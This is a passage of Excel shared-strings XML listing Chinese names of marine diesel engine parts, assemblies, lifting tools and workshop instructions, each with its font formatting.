        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油箱布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端盖后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导杆装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平均有效压力布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>立柱装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油泵出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀连接法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>档圈用夹钳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭矩扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吹气阀测试工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吹气阀用适配接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液力滤器单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标记</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>往复运动部件，船上检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组装通则</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发运形式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锌块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插芯支撑梁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端盖管板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磁粉检测说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>胶水说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管焊接说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>降速图表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>错位报警系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>错位报警图表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油泵备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油分配器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部前段</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部中段</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部后段</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架前段</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架后段</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座前端不包括曲轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴前段</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴后段</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴瓦拆卸工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>样本的准备，涂装完成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>生产建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块的主尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气凸轮修复</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转轴平衡图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄更换</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>成品尺寸检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油，燃油，空气供给</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓，两端螺纹</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蝶形螺帽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磁铁</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆柱状</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平键</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸铁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆刮环盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>箱型罐</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>箱型容器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷凝室</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>立柱部分</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标识码</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标签条</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铝板，合金</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>网纹钢板（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>5MM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>网纹钢板（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>8MM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铝制部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铝管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型铁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊粉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铝青铜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管末端绝缘套筒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平颈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>腰形法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吹气喷嘴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力安全阀，多样式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷凝罐</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条安装钳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阶梯冲头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平行杠，试车车间用</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吊具附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部导向砂轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>麻花钻</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
